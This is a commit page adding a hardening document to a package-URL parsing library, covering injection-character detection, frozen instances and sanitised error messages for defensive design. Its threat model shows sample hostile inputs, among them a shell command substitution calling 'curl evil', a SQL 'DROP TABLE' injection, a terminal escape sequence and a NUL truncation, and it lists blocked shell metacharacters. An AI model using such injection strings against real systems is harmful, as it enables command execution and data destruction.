Skip to content

Commit 5d613e1

Browse files
committed
docs(hardening): add strong-stance doc on injection + freeze + error shape
Renamed from "safety" to "hardening" — term of art in security engineering, pairs with the existing gerund filenames (building, parsing). Covers the library's protective posture toward PURL strings as hostile input: isInjectionCharCode (C0/shell/C1/unicode classes), recursiveFreeze with LOOP_SENTINEL cap, charLabel-only error messages, the six-entry threat model, red flags for reviewers, and an explicit "what this library does NOT defend against" section so callers understand where the boundary is. Junior-dev level: every section has a why, not just a what. Reviewer checklist for new ecosystem handlers makes the doctrine enforceable in PR review.
1 parent 60ccd28 commit 5d613e1

2 files changed

Lines changed: 257 additions & 0 deletions

File tree

docs/hardening.md

Lines changed: 251 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,251 @@
1+
# Hardening
2+
3+
How this library treats PURL strings as hostile input and refuses to
4+
hand downstream consumers something that can hurt them. Read this
5+
if you are touching `src/strings.ts`, `src/objects.ts`, `src/error.ts`,
6+
or reviewing a PR that adds a new ecosystem handler.
7+
8+
## Who this is for
9+
10+
Contributors adding or reviewing code paths that read PURL input
11+
from the outside (user text, CLI args, API payloads, file contents).
12+
The rules here keep the library from being a confused deputy for a
13+
caller with hostile intent.
14+
15+
## The stance
16+
17+
**Valid PURLs never throw. Hostile input never parses.**
18+
19+
That is the whole doctrine. Everything below is mechanics that turn
20+
it into code.
21+
22+
A well-formed PURL (passes spec shape + no dangerous characters)
23+
builds a frozen `PackageURL` instance the caller can rely on. An
24+
ill-formed PURL throws a `PurlError`. An input that looks like it
25+
wants to be interpreted twice — once as a PURL, and again by a
26+
downstream consumer (shell, SQL, URL, log pipeline) — throws a
27+
`PurlInjectionError` **before parse**. The caller never sees a
28+
half-interpreted object.
29+
30+
## The threat model
31+
32+
We assume the attacker controls the PURL string. They may try to:
33+
34+
1. **Inject shell metacharacters** so a downstream caller that
35+
interpolates the PURL into a command executes something the
36+
caller didn't intend. Example:
37+
`pkg:npm/$(curl evil)/x@1`.
38+
2. **Break out of a quoted context** so the PURL becomes argv
39+
splitting fodder or SQL quote-escape. Example:
40+
`pkg:npm/a";DROP TABLE pkgs;--/x@1`.
41+
3. **Desync terminal / log parsers** with control characters, so a
42+
log-review tool renders attacker-controlled bytes as if they
43+
were tool output. Example: `pkg:npm/a\x1b[2Jb/x@1`.
44+
4. **Smuggle invisible characters** (zero-width spaces, RLO
45+
overrides, BOM) so the rendered name looks like one package but
46+
resolves to another. Example: `pkg:npm/react​act@1`.
47+
5. **Truncate** with NUL, so a PURL that looks harmless to a JS
48+
string parser gets half-read by a C library. Example:
49+
`pkg:npm/safe\x00evil@1`.
50+
6. **Mutate a PackageURL** after it has been built, so a consumer
51+
downstream sees a different name than the one that was validated
52+
upstream.
53+
54+
This doc is how the library refuses all six.
55+
56+
## The first line: injection-character detection
57+
58+
`src/strings.ts` exports `isInjectionCharCode(code: number)`. It
59+
returns `true` for any character code in one of four classes:
60+
61+
| Class | Codes | Why |
62+
|---|---|---|
63+
| **C0 control characters** | `0x00``0x1f` | NUL (truncation), TAB / LF / CR (log injection), ESC (terminal escape), everything else in that range |
64+
| **Shell metacharacters + brackets + quotes** | `0x20` (space), `!`, `"`, `#`, `$`, `%`, `&`, `'`, `(`, `)`, `*`, `;`, `<`, `=`, `>`, `?`, `[`, `\`, `]`, `` ` ``, `{`, `|`, `}`, `~`, DEL | Shell interpretation, SQL quote-escape, URL-fragment injection |
65+
| **C1 control characters** | `0x80``0x9f` | Legacy control bytes; some terminals still act on them |
66+
| **Unicode invisible/directional** | `U+200B``U+200F`, `U+202A``U+202E`, `U+2060`, `U+FEFF`, `U+FFFC`, `U+FFFD` | Zero-width chars, bidi override characters (IDN-homograph attacks), BOM, object replacement |
67+
68+
Any input containing one of these characters in a component where
69+
we scan for injection throws `PurlInjectionError` before the
70+
standard parse logic runs. The error names:
71+
72+
- Which **purl type** the component belongs to (`npm`, `maven`, …)
73+
- Which **component** failed (`name`, `namespace`, …)
74+
- The **char code** and a human-readable label
75+
76+
```typescript
77+
class PurlInjectionError extends PurlError {
78+
readonly charCode: number
79+
readonly component: string
80+
readonly purlType: string
81+
}
82+
```
83+
84+
Callers who want to treat injection attempts as auditable events
85+
(log, alert, rate-limit the source) can `catch` specifically for
86+
`PurlInjectionError` and route those up while still handling
87+
`PurlError` as "just a malformed PURL."
88+
89+
## The narrower scanner for freer contexts
90+
91+
Some PURL components (like version strings or URL-based qualifier
92+
values) are legitimately allowed to carry characters that are
93+
dangerous elsewhere — a URL qualifier value may contain `?`, `&`,
94+
`=`, `:`, `/` as part of a normal URL. For those contexts
95+
`src/strings.ts` exports a narrower scanner that only blocks the
96+
characters that actually enable shell execution or code injection:
97+
the control characters, the shell metacharacters (`|`, `&`, `;`,
98+
`` ` ``, `$`, `<`, `>`, `(`, `)`, `{`, `}`, `\`), and quotes.
99+
100+
The choice between the broad and narrow scanner is the difference
101+
between "this component should be a plain identifier" (use the
102+
broad scanner; anything non-identifier is suspicious) and "this
103+
component is a URL-shaped value" (use the narrow scanner; pass
104+
through URL syntax).
105+
106+
## The second line: immutable instances
107+
108+
`src/objects.ts` exports `recursiveFreeze(value)`. Every
109+
`PackageURL` instance runs through it at construction time:
110+
111+
- Top-level instance is `Object.freeze`-d.
112+
- Qualifiers object is frozen.
113+
- Any nested objects or arrays reachable from the instance are
114+
frozen.
115+
116+
That means a `PackageURL` you receive from a library call cannot be
117+
mutated by a later code path:
118+
119+
```typescript
120+
const purl = new PackageURL('npm', undefined, 'safe-pkg', '1.0.0')
121+
purl.name = 'evil-pkg' // silently ignored (strict mode: throws)
122+
purl.qualifiers.key = 'hax' // silently ignored (strict mode: throws)
123+
```
124+
125+
This matters when a validated PURL is passed through 3+ hops — a
126+
middle hop can't secretly modify the object and hand it to the next
127+
hop. Validation up front + freeze means "validated" still means
128+
something at the endpoint.
129+
130+
The freeze walk is **breadth-first** with a `WeakSet` for cycle
131+
detection and a hard ceiling at one million nodes
132+
(`LOOP_SENTINEL`). An adversary-constructed cyclic object cannot
133+
loop the walker forever; a million-node object graph throws
134+
`Error("Object graph too large…")` rather than OOM-ing the
135+
process.
136+
137+
## The third line: error messages that don't leak
138+
139+
`src/error.ts`'s `formatPurlErrorMessage` normalizes every
140+
user-visible error message:
141+
142+
- Lowercase the first letter (`Invalid → invalid`)
143+
- Strip a trailing period
144+
- Prefix with `Invalid purl:`
145+
146+
The normalization matters because error strings land in logs,
147+
support tickets, and sometimes in HTTP responses. A consistent
148+
shape:
149+
150+
- Is grep-able (every one starts with `Invalid purl:`).
151+
- Never renders attacker-controlled bytes verbatim when injection is
152+
detected — the `PurlInjectionError` message says *the char label*
153+
(e.g. "SPACE", "NUL", "BACKTICK"), not the raw character, so a
154+
terminal that pipes the log never interprets an ESC sequence the
155+
attacker embedded.
156+
157+
## When to call what
158+
159+
| Situation | Use |
160+
|---|---|
161+
| Parsing a full PURL string from untrusted input | `new PackageURL(str)` — catches `PurlInjectionError` + `PurlError` |
162+
| Validating a user-submitted PURL in a form | `PackageURL.fromStringResult(str)` — returns `Result`, collect failures |
163+
| Building a PURL from already-trusted pieces (internal codepaths) | `new PackageURL(type, ns, name, version, qualifiers, subpath)` — still runs validation but you know the inputs are clean |
164+
| Comparing two PURLs | `purl.equals(other)` / `purl.matches(pattern)` — both ReDoS-safe |
165+
166+
For converter utilities (URL → PURL, PURL → URL) see
167+
`docs/converters.md`; for the builder API see `docs/builders.md`.
168+
169+
## Red flags when reviewing a PR
170+
171+
If a PR touches PURL-component handling, pause if you see any of:
172+
173+
1. **Bypassing the injection scan.** A rule like "skip
174+
`isInjectionCharCode` for this type because the user won't ever
175+
put weird characters there" is exactly the kind of assumption
176+
that gets a library blamed for the next CVE. If the scan is
177+
expensive in a hot path, optimize the scan — never skip it.
178+
2. **Unfreezing.** No `Object.freeze(purl, { writable: true })`.
179+
No cloning into a mutable shape unless it is a new instance
180+
being built from scratch. If you see code that hands back a
181+
mutable copy, call it out.
182+
3. **Raw char interpolation in error messages.** Every
183+
`PurlInjectionError` is built from `charLabel`, not the raw
184+
character. If a new error message string-interpolates a
185+
suspect char directly, that message will render the char
186+
verbatim in someone's terminal later.
187+
4. **Removing the `LOOP_SENTINEL` cap** on `recursiveFreeze` or
188+
bumping it to `Infinity`. The ceiling is the last line between a
189+
hostile cyclic object and process-wide OOM.
190+
5. **Catching and swallowing `PurlInjectionError` silently.**
191+
Injection attempts are a signal, not noise. They deserve to
192+
propagate to the caller who can choose to log/alert/block.
193+
6. **New ecosystem handler that doesn't use `PurlComponent`'s
194+
shared normalize/validate.** Every ecosystem inherits the
195+
injection scan via the shared components. An ad-hoc parser
196+
inside `src/purl-types/<x>.ts` bypasses that by default.
197+
198+
## What this library does **not** defend against
199+
200+
Be honest about scope:
201+
202+
- **Resource exhaustion.** A very long valid PURL will still be
203+
processed. We do not impose a max string length. Callers who
204+
accept PURLs from the wire should rate-limit and size-limit at
205+
the boundary.
206+
- **Regex catastrophic backtracking in patterns you pass to us.**
207+
The library's own internal regexes are ReDoS-free (simple char
208+
scans), but if you pass a user-controlled pattern to
209+
`purl.matches(userPattern)`, validate that pattern yourself.
210+
- **Typosquatting / ecosystem-level package confusion.** That is a
211+
policy problem at the package-registry layer (Socket's main
212+
product, in fact) — not a string-level check this library can
213+
make.
214+
- **Crafted URLs in URL-converter inputs.** `urlConverter.fromUrl`
215+
trusts its input is a real URL string. Pass untrusted URLs
216+
through `new URL()` first.
217+
218+
If the caller's use case hits one of these, document it at the
219+
boundary; don't try to push it into the library.
220+
221+
## Checklist for adding a new ecosystem handler
222+
223+
- [ ] Handler file at `src/purl-types/<name>.ts`.
224+
- [ ] `normalize`, `validate` rules use the shared `PurlComponent`
225+
helpers — no ad-hoc parsing.
226+
- [ ] Any custom check calls `isInjectionCharCode` (or the narrower
227+
command-execution scanner) before other logic.
228+
- [ ] Tests include at least one case per injection class (shell
229+
char, control char, unicode invisible) — expect
230+
`PurlInjectionError`.
231+
- [ ] No mutation of the PURL instance after construction.
232+
- [ ] No catch-and-swallow of `PurlInjectionError`.
233+
- [ ] Error messages use `charLabel`, never raw chars.
234+
- [ ] Registered in `src/purl-type.ts`'s `knownTypes` map.
235+
- [ ] `pnpm test` green, `pnpm cover` still at 100%.
236+
237+
## Further reading
238+
239+
- [`docs/architecture.md`](./architecture.md) — where these modules
240+
fit in the larger design.
241+
- [`docs/api.md`](./api.md) — the full public API reference.
242+
- [`docs/vers.md`](./vers.md) — version-range specifiers; also
243+
hostile-input territory.
244+
- [`src/strings.ts`](../src/strings.ts)`isInjectionCharCode` +
245+
narrower scanners.
246+
- [`src/objects.ts`](../src/objects.ts)`recursiveFreeze` +
247+
`LOOP_SENTINEL`.
248+
- [`src/error.ts`](../src/error.ts)`PurlError` +
249+
`PurlInjectionError` + `formatPurlErrorMessage`.
250+
- [package-url/purl-spec](https://github.com/package-url/purl-spec)
251+
the upstream spec this library implements.

tour.json

Lines changed: 6 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -173,6 +173,12 @@
173173
"source": "docs/architecture.md",
174174
"summary": "Module map, data flow, and the key abstractions that keep the library small."
175175
},
176+
{
177+
"filename": "hardening",
178+
"title": "Hardening",
179+
"source": "docs/hardening.md",
180+
"summary": "How the library treats PURL strings as hostile input — injection-character detection, frozen instances, and a strong protective stance."
181+
},
176182
{
177183
"filename": "tour",
178184
"title": "Tour",

0 commit comments

Comments
 (0)